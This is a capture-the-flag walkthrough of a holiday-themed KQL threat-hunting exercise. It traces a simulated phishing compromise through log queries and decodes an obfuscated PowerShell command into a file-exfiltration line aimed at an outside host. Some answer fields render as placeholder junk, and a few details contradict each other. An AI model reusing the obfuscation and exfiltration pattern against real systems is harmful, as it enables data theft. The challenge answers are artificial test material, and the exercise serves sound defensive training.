KQL Kraken Hunt⚓︎
Difficulty:
Direct link: Objective5.zip
Network Infection on Film Noir Island⚓︎
Objective⚓︎
Request
Use Azure Data Explorer to uncover misdeeds in Santa's IT enterprise. Go to Film Noir Island and talk to Tangle Coalbox for more information.
Tangle Coalbox
Greetings, rookie. Tangle Coalbox of Kusto Detective Agency here.
I've got a network infection case on Film Noir Island that needs your expertise.
Seems like someone clicked a phishing link within a client's organization, and trouble's brewing.
I'm swamped with cases, so I need an extra pair of hands. You up for the challenge?
You'll be utilizing the Azure Data Explorer and those KQL skills of yours to investigate this incident.
Before you start, you'll need to create a free cluster.
Hints⚓︎
File Creation
Looking for a file that was created on a victim system? Don't forget the FileCreationEvents table.
KQL Tutorial
Once you get into the Kusto trainer, click the blue Train me for the case button to get familiar with KQL.
Outbound Connections
Do you need to find something that happened via a process? Pay attention to the ProcessEvents table!
Solution⚓︎
After you have set up your free cluster and run the script referenced at the Kusto website referenced in the hints, it's time to start querying using Azure Data Explorer.
How many Craftperson Elf's are working from laptops?
Typo
The Kusto Detective website spells the role as Craftperson Elf in the question, but if you look closely in the database, it is actually spelled Craftsperson Elf.
The following KQL query finds the answer:
Employees
| where role == "Craftsperson Elf"
| count
Answer
92
Case 1: Spearphising Email⚓︎
The following malicious link is clicked by an employee: http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx
What is the email address of the employee who received this phishing email?
What is the email address that was used to send this spear phishing email?
What was the subject line used in the spear phishing email?
All three questions can be answered with the proper query:
Email
| where link == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"
Confusing Label
While the first question asks for an email address, the input field displays "Employee Name." Go with the email address.
Answer: Employee Email
alabaster_snowball@santaworkshopgeeseislands.org
Answer: Sender Email
cwombley@gmail.com
Answer: Subject Line
[EXTERNAL] Invoice foir reindeer food past due
Case 2: Victim Details⚓︎
What is the role of our victim in the organization?
What is the hostname of the victim's machine?
What is the source IP linked to the victim?
Similarly to Case 1, these questions can also be answered in one query since we know that each of those key values are included in the Employees table:
Employees
| where email_addr == "alabaster_snowball@santaworkshopgeeseislands.org"
Answer: Role
Head Elf
Answer: Hostname
Y1US-DESKTOP
Answer: IP Address
10.10.0.4
Case 3: Attacker Activities⚓︎
Case 3 questions can be answered with a couple of different queries.
What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!
OutboundNetworkEvents
| where src_ip == "10.10.0.4"
Answer: Timestamp
2023-12-02T10:12:42Z
What file is dropped to Alabaster's machine shortly after he downloads the malicious file?
FileCreationEvents
| where timestamp >= datetime("2023-12-02T10:12:42")
Answer: Filename
giftwrap.exe
Case 4: Compromised Host⚓︎
The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?
ProcessEvents
| where timestamp >= datetime("2023-12-02T10:12:42")
| where hostname == "Y1US-DESKTOP"
Answer Forwarding IP Address
1 2 3 4 5 6 7 8 | |
What is the timestamp when the attackers enumerated network shares on the machine?
Answer: Timestamp
1 2 3 4 5 6 7 8 | |
What was the hostname of the system the attacker moved laterally to?
ProcessEvents
| where timestamp >= datetime("2023-12-02T10:12:42")
| where hostname == "Y1US-DESKTOP"
| where process_name == "cmd.exe" or process_name == "powershell.exe"
Answer: Hostname
1 2 3 4 5 6 7 8 | |
Case 5: Encoded Messages⚓︎
When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?
ProcessEvents
| where timestamp >= datetime("2023-12-02T10:12:42")
| where hostname == "Y1US-DESKTOP"
| where process_name == "cmd.exe" or process_name == "powershell.exe"
Answer: Timestamp
1 2 3 4 5 6 7 8 | |
What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)
Base64 Encoded Message:⚓︎
The following message can be decoded using tools like CyberChef or ChatGPT.
Answer: Filename
NaughtyNiceList.txt
The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?
From the same query, the second encoded powershell command, when decoded form base64, reveals another layer of encoding:
ChatGPT can help identify what type of encoding and decode it:
Chacho
Can you decode this command? [StRiNg]::JoIn( '', ChaR[])|& ((gv 'MDr').NamE[3,11,2]-joiN
ChatGPT
The provided command is a PowerShell command that involves several steps to interpret what it's doing. Let's break it down:
[StRiNg]::JoIn( '', ChaR[]):
This part of the command is creating a string by joining characters together. The characters are represented by their ASCII values in the array ChaR[]. The array of numbers (100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, ...):
These numbers are ASCII codes for characters. To understand what they represent, we need to convert these ASCII values to their corresponding characters. |& ((gv 'MDr').NamE[3,11,2]-joiN:
This part is a bit more complex. |& is used to execute the string result from the previous part as a command. ((gv 'MDr').NamE[3,11,2]-joiN) appears to be accessing and joining certain elements of a global variable (or a set of variables) whose names match the pattern MDr. This could be part of a dynamic code execution or a way to obfuscate what command is being executed. To fully understand what this command does, we need to first decode the ASCII codes into characters. Let's do that:
The ASCII codes decode to the following string:
downwithsanta.exe -exfil C:\Desktop\NaughtNiceList.docx \giftbox.com\file
This string appears to be a command to execute downwithsanta.exe with some parameters. The parameters -exfil followed by a file path and a network location suggest that the downwithsanta.exe program might be used to exfiltrate (i.e., illegally copy and transfer) the file NaughtNiceList.docx from the user's desktop to a remote location \giftbox.com\file.
The latter part of the original command, |& ((gv 'MDr').NamE[3,11,2]-joiN), is likely intended to dynamically execute this command, possibly using a method to bypass detection or obfuscate the actual command being run.
It's important to note that this seems to be a part of a potentially malicious script, especially given the context of exfiltrating files. If you encounter such scripts in a real-world scenario, it's crucial to exercise caution and consider the security implications.
Answer: Domain Name
# Converting ASCII values to characters and joining them to form a string
ascii_values = [100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32,
45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92,
92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99,
120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101]
decoded_string = ''.join([chr(ascii_code) for ascii_code in ascii_values])
decoded_string
downwithsanta.exe -exfil C:\\\\Desktop\\\\NaughtNiceList.docx \\\\giftbox.com\\file
Case 6: The Final Step⚓︎
What is the name of the executable the attackers used in the final malicious command?
Executable Answer
downwithsanta.exe
What was the command line flag used alongside this executable?
Flag Answer
--exfil
Query for Credit⚓︎
Run this query to get the phrase to submit to complete this objective.
print base64_decode_tostring('QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==')
Objective Answer
Beware the Cube that Wombles
Response⚓︎
Tangle Coalbox
I had my doubts, but you've proven your worth.
That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess.